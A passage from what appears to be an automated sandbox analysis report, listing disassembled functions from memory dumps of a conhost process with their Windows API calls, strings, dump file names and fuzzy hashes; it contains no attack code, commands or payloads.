StrCpyW.SHLWAPI ref: 0000013F08E61B32

Strings

\\?\, xrefs: 0000013F08E61B02

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 34052c071b719d8e8e72a8c00681c5bf6e8dd6a73386c6b281cb8d86842af472
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 78F0A432704684D2F7348B68F4843996B62F754BC8F884039EA4942559DF6CC79AC701

Function 0000013F08E91AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000013F08E91AF4
StrCmpNIW.SHLWAPI ref: 0000013F08E91B0E
lstrlenW.KERNEL32 ref: 0000013F08E91B1D
StrCpyW.SHLWAPI ref: 0000013F08E91B32

Strings

\\?\, xrefs: 0000013F08E91B02

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 9a7224ca8ed6ff55ac9c44dfbb6369fc8dd60dc1c0a8b125d09d88cae787983e
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 05F0A432704685D2EB249BA8F4C4399AB62F744F88F844039EE8942959EEACC74AC701

Function 0000013F08E63708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,0000013F08E6275A), ref: 0000013F08E6372A
StrCpyW.SHLWAPI ref: 0000013F08E6373A
StrCatW.SHLWAPI ref: 0000013F08E63746
PathCombineW.SHLWAPI(?,?,00000000,0000013F08E6275A), ref: 0000013F08E63754

Strings

\\.\pipe\, xrefs: 0000013F08E63720

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: a615e2c07fecb0a86d1218a6a19c0bb271ec05c9b1d00cf2b502f2f473acd8ba
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 24F08974B04B8091EA284B9BF9141955A52B748FD0F444134FE0A0772ACE2CC657C701

Function 0000013F08E6B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000013F08E6B929
GetProcAddress.KERNEL32 ref: 0000013F08E6B93F
FreeLibrary.KERNEL32 ref: 0000013F08E6B95B

Strings

mscoree.dll, xrefs: 0000013F08E6B920
CorExitProcess, xrefs: 0000013F08E6B938

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: b21fb235a91b4ee90da7b0a0c142b77f7ce56195a3530ed3852a6f17d4db37df
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 78F09671A00A0181FA288BA8E8453D91B32FB857A0F94023DEA6A451F6DF3CC64AC702

Function 0000013F08E93708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,0000013F08E9275A), ref: 0000013F08E9372A
StrCpyW.SHLWAPI ref: 0000013F08E9373A
StrCatW.SHLWAPI ref: 0000013F08E93746
PathCombineW.SHLWAPI(?,?,00000000,0000013F08E9275A), ref: 0000013F08E93754

Strings

\\.\pipe\, xrefs: 0000013F08E93720

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: d0901b0169ebbbc7ebdef58c8a3556640387ee146d66d5ba9f13aeb3dd56de5c
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: EBF08974B04B8081EA184BDBB914199DA62B788FC1F449134FE460771ADE6CD647C701

Function 0000013F08E9B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000013F08E9B929
GetProcAddress.KERNEL32 ref: 0000013F08E9B93F
FreeLibrary.KERNEL32 ref: 0000013F08E9B95B

Strings

mscoree.dll, xrefs: 0000013F08E9B920
CorExitProcess, xrefs: 0000013F08E9B938

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 019af116400ea184c74576e24e222d32bb597976a66ec0106651c8cbc885f4ba
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 85F09C7171064181EA184B98E8843D99B75EB85B60F54023DFE7A451F5CF6CC646C701

Function 0000013F08E65810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000013F08E65896

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 8554458edd81deb222f63ad67fa4fad62d809b57c071aea4393534bf01a0746e
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 5A02FB32619B84C6E764CB99F49439ABBA1F3C4794F100029FA8E87BA9DF7CC555CB01

Function 0000013F08E95810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000013F08E95896

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 5937e515a267a7103a3ebcf8744dff559d9cb6b554d9d5d05833ab6f95d5e8fd
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: D502C932519BC486E765CB59F49039ABBA1F3C4794F104029FACE87BA9DBBCC545CB01

Function 0000013F08E62C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000013F08E62CAD
TlsGetValue.KERNEL32 ref: 0000013F08E62CBC
TlsGetValue.KERNEL32 ref: 0000013F08E62CCB
TlsSetValue.KERNEL32 ref: 0000013F08E62E0F
TlsSetValue.KERNEL32 ref: 0000013F08E62E1E
TlsSetValue.KERNEL32 ref: 0000013F08E62E2D

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: a3f6486def5da78a39bb722cac91ca2fafb2fc73c79e56277302f4424d6059c0
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: B551B131A0460187E36DCB9AE4446DA7BA2F788B84F10403DFE4A43B56DB3CCA57CB01

Function 0000013F08E92C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000013F08E92CAD
TlsGetValue.KERNEL32 ref: 0000013F08E92CBC
TlsGetValue.KERNEL32 ref: 0000013F08E92CCB
TlsSetValue.KERNEL32 ref: 0000013F08E92E0F
TlsSetValue.KERNEL32 ref: 0000013F08E92E1E
TlsSetValue.KERNEL32 ref: 0000013F08E92E2D

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 3e16c67a491fd5f217713d30dd6fa406786d1742dfc1b93882ece04dbb1a4533
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 9F51D431A04641A7E72DCB9DA45069ABBA6F388B50F10403DFE9A43756DBBCCA07CB01

Function 0000013F08E62AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000013F08E62AE1
TlsGetValue.KERNEL32 ref: 0000013F08E62AF0
TlsGetValue.KERNEL32 ref: 0000013F08E62AFF
TlsSetValue.KERNEL32 ref: 0000013F08E62C3B
TlsSetValue.KERNEL32 ref: 0000013F08E62C4A
TlsSetValue.KERNEL32 ref: 0000013F08E62C59

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 443372f2e94133890a2d9e75df6503bcfed7df4c90292a98b9b8188077081556
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 36518F35A1464197E72CCFAEE84069A7BA2F388B84F54412DEE4A43756DF3CCA17CB05

Function 0000013F08E92AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000013F08E92AE1
TlsGetValue.KERNEL32 ref: 0000013F08E92AF0
TlsGetValue.KERNEL32 ref: 0000013F08E92AFF
TlsSetValue.KERNEL32 ref: 0000013F08E92C3B
TlsSetValue.KERNEL32 ref: 0000013F08E92C4A
TlsSetValue.KERNEL32 ref: 0000013F08E92C59

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: cd9095a9a0778f448d96ee65bc0878cb8f58b228f33e4e829641665f94dcebb6
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 5751C631A14641E7D72CCF99A45069ABBA2F384B80F10403CEE9A03756DF7CDA07CB01

Function 0000013F08E65E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000013F08E65E66

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: fab8fb076477a3eef08acd71fa8e62d9454472066124615102eb78604016ddf0
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: EE61F136A28B44C6E764CB59E45435EBBE2F388784F101229FA8D43BA5DB7CC655CF01

Function 0000013F08E95E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000013F08E95E66

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: a843344290f62ef94d89df11f8c6fcb590f107abb6472b971d1e107fad49e5b3
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: C261E036929B84C6E765CB59E49435ABBA2F388794F10012AFECD43BA5DB7CC641CF01

Function 0000013F08E63EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63F68

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: cf09b268a046f788a69e52a52cbd72adfd6f86636ab978d42c68e64024b35131
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 3E114236E09740D3FB288B69F40429A6BB1FB45B80F04003AEE4D03795EB7DCA56C785

Function 0000013F08E93EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93F68

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 5b97f4b4fbc870d0e56c7113504ae45148121da877175fb16d409aab253db827
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 31114636A09740D3EB288BA9E44429AAB71F745B80F04003AEE9D03755EB7DDB55C785

Function 0000013F08E68CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000013F08E68CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000013F08E68D62
RtlUnwindEx.NTDLL ref: 0000013F08E68DBC

Strings

csm, xrefs: 0000013F08E68D49

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: fa71f1a5ab83497a7cca10764eec9ec9edb9472936b0af796ae559f20db99883
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 8651E432B116108AEB58CB9DE444BAC7B97F354BD8F144139FA4A4778ADB7CCA62C701

Function 0000013F08E98CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000013F08E98CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000013F08E98D62
RtlUnwindEx.NTDLL ref: 0000013F08E98DBC

Strings

csm, xrefs: 0000013F08E98D49

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

